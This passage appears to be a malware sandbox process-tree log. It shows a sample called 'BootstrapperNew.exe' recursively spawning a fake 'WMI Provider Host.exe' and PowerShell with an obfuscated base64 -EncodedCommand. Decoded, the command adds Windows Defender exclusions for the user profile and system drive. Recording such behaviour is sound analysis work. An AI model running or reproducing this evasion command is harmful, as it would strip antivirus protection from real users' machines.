        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        176⤵
        
        PID:5280
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        176⤵
        
        PID:7560
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        176⤵
        
        PID:744
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        177⤵
        
        PID:6088
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        177⤵
        
        PID:2744
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        177⤵
        
        PID:3228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        178⤵
        
        PID:7756
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        178⤵
        
        PID:2448
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        178⤵
        
        PID:5448
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        179⤵
        
        PID:6572
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        179⤵
        
        PID:4604
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        179⤵
        
        PID:7748
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        180⤵
        
        PID:6736
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        180⤵
        
        PID:5956
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        180⤵
        
        PID:5540
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        181⤵
        
        PID:7420
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        181⤵
        
        PID:5924
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        181⤵
        
        PID:5720
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        182⤵
        
        PID:4628
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        182⤵
        
        PID:5124
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        182⤵
        
        PID:7232
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        183⤵
        
        PID:3612
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        183⤵
        
        PID:5780
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        183⤵
        
        PID:5128
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        184⤵
        
        PID:6380
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        184⤵
        
        PID:8156
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        184⤵
        
        PID:5468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        185⤵
        
        PID:5836
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        185⤵
        
        PID:7408
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        185⤵
        
        PID:5460
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        186⤵
        
        PID:5792
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        186⤵
        
        PID:7188
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        186⤵
        
        PID:1208
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        187⤵
        
        PID:5752
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        187⤵
        
        PID:7564
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        187⤵
        
        PID:7860
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        188⤵
        
        PID:944
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        188⤵
        
        PID:6556
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        188⤵
        
        PID:6232
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        189⤵
        
        PID:7900
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        189⤵
        
        PID:644
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        189⤵
        
        PID:6360
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        190⤵
        
        PID:6720
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        190⤵
        
        PID:6576
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        190⤵
        
        PID:4428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        191⤵
        
        PID:3352
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        191⤵
        
        PID:7600
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        191⤵
        
        PID:7932
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        192⤵
        
        PID:6224
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        192⤵
        
        PID:5936
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        192⤵
        
        PID:8184
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        193⤵
        
        PID:7224
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        193⤵
        
        PID:5508
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        193⤵
        
        PID:6084
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        194⤵
        
        PID:1928
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        194⤵
        
        PID:7552
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        194⤵
        
        PID:1680
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        195⤵
        
        PID:5068
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        195⤵
        
        PID:7284
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        195⤵
        
        PID:3428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        196⤵
        
        PID:8152
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        196⤵
        
        PID:7956
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        196⤵
        
        PID:7860
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        197⤵
        
        PID:4048
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        197⤵
        
        PID:6056
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        197⤵
        
        PID:2644
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        198⤵
        
        PID:7656
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        198⤵
        
        PID:5000
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        198⤵
        
        PID:7916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        199⤵
        
        PID:5612
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        199⤵
        
        PID:5324
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        199⤵
        
        PID:7000
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        200⤵
        
        PID:6896
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        200⤵
        
        PID:1688
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        200⤵
        
        PID:1892
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        201⤵
        
        PID:3792
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        201⤵
        
        PID:1028
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        201⤵
        
        PID:7408
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        202⤵
        
        PID:7876
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        202⤵
        
        PID:6492
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        202⤵
        
        PID:2096
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        203⤵
        
        PID:208
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        203⤵
        
        PID:1240
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        203⤵
        
        PID:2744
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        204⤵
        
        PID:1228
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        204⤵
        
        PID:2328
        
